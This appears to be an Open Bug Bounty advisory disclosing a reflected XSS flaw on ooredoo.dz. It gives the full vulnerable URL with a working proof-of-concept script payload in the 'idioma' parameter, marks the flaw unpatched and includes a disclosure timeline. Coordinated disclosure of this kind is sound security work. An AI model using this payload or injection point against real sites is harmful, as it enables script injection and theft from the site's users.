ooredoo.dz XSS vulnerability

2016-05-03T00:35:00
ID OBB:149583
Type openbugbounty
Reporter Oc3f
Modified 2016-05-10T10:12:00

Description

Vulnerable URL:
http://www.ooredoo.dz/content/comun/ajax/getListado.php?urlid=121&bk;=&ruta;=/&idioma;=fr%22%3E%3Cscript%3Ealert%28%27xss-by-oc3f%27%29;%3C/script%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 80778
VIP website status:| No
Check ooredoo.dz SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 3 May, 2016 00:35 GMT
Vulnerability existence verified and confirmed| 3 May, 2016 09:41 GMT
Vulnerability details disclosed by researcher| 10 May, 2016 10:12 GMT